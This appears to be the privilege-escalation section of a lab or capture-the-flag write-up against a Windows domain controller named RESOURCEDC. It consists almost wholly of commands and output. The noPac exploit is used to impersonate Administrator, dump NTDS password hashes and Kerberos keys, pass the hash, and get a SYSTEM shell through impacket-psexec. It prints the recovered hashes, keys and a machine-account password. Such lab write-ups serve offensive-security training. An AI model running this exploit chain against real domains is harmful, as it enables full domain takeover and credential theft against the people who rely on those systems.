Priv Esc
$ netexec smb 192.168.170.175 -u L.Livingstone -H 19a3a7550ce8c505c2d46b5e39d6f808 -M nopac
SMB 192.168.170.175 445 RESOURCEDC [*] Windows 10 / Server 2019 Build 17763 x64 (name:RESOURCEDC) (domain:resourced.local) (signing:True) (SMBv1:False)
SMB 192.168.170.175 445 RESOURCEDC [+] resourced.local\L.Livingstone:19a3a7550ce8c505c2d46b5e39d6f808
NOPAC 192.168.170.175 445 RESOURCEDC TGT with PAC size 1450
NOPAC 192.168.170.175 445 RESOURCEDC TGT without PAC size 653
NOPAC 192.168.170.175 445 RESOURCEDC
NOPAC 192.168.170.175 445 RESOURCEDC VULNERABLE
NOPAC 192.168.170.175 445 RESOURCEDC Next step: https://github.com/Ridter/noPac
$ echo 192.168.170.175 RESOURCEDC resourced.local RESOURCEDC.resourced.local | sudo tee -a /etc/hosts
192.168.170.175 RESOURCEDC resourced.local RESOURCEDC.resourced.local$ python noPac.py resourced.local/L.Livingstone -hashes :19a3a7550ce8c505c2d46b5e39d6f808 -dc-ip 192.168.170.175 -dc-host RESOURCEDC --impersonate Administrator -dump -just-dc-user Administrator -use-ldap
███ ██ ██████ ██████ █████ ██████
████ ██ ██ ██ ██ ██ ██ ██ ██
██ ██ ██ ██ ██ ██████ ███████ ██
██ ██ ██ ██ ██ ██ ██ ██ ██
██ ████ ██████ ██ ██ ██ ██████
[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target RESOURCEDC.resourced.local
[*] will try to impersonate Administrator
[*] Adding Computer Account "WIN-LKSXTEHHJQ3$"
[*] MachineAccount "WIN-LKSXTEHHJQ3$" password = FuKyJY@u0fZW
[*] Successfully added machine account WIN-LKSXTEHHJQ3$ with password FuKyJY@u0fZW.
[*] WIN-LKSXTEHHJQ3$ object = CN=WIN-LKSXTEHHJQ3,CN=Computers,DC=resourced,DC=local
[*] WIN-LKSXTEHHJQ3$ sAMAccountName == RESOURCEDC
[*] Saving a DC's ticket in RESOURCEDC.ccache
[*] Reseting the machine account to WIN-LKSXTEHHJQ3$
[*] Restored WIN-LKSXTEHHJQ3$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Saving a user's ticket in Administrator.ccache
[*] Rename ccache to Administrator_RESOURCEDC.resourced.local.ccache
[*] Attempting to del a computer with the name: WIN-LKSXTEHHJQ3$
[-] Delete computer WIN-LKSXTEHHJQ3$ Failed! Maybe the current user does not have permission.
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8e0efd059433841f73d171c69afdda7c:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:8b390f83fedcfa8a5275a4a80ab1200da3c6420a502eec668fc3a23d3d8cfba5
Administrator:aes128-cts-hmac-sha1-96:efa1aa29ae0536b35a2534f0abd881a3
Administrator:des-cbc-md5:0de34cf7bf32898f
[*] Cleaning up...
Administrator:8e0efd059433841f73d171c69afdda7c$ netexec smb 192.168.170.175 -u Administrator -H 8e0efd059433841f73d171c69afdda7c
SMB 192.168.170.175 445 RESOURCEDC [*] Windows 10 / Server 2019 Build 17763 x64 (name:RESOURCEDC) (domain:resourced.local) (signing:True) (SMBv1:False)
SMB 192.168.170.175 445 RESOURCEDC [+] resourced.local\Administrator:8e0efd059433841f73d171c69afdda7c (Pwn3d!)
$ impacket-psexec resourced.local/[email protected] -hashes :8e0efd059433841f73d171c69afdda7c
Impacket v0.12.0.dev1+20240807.21946.829239e - Copyright 2023 Fortra
[*] Requesting shares on 192.168.170.175.....
[*] Found writable share ADMIN$
[*] Uploading file oWGowvHH.exe
[*] Opening SVCManager on 192.168.170.175.....
[*] Creating service RERK on 192.168.170.175.....
[*] Starting service RERK.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2145]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> hostname && whoami.exe && type C:\Users\Administrator\Desktop\proof.txt && ipconfig
ResourceDC
nt authority\system
54564fec8409f1ef939bc1292ab5192d
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.170.175
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.170.254
Last updated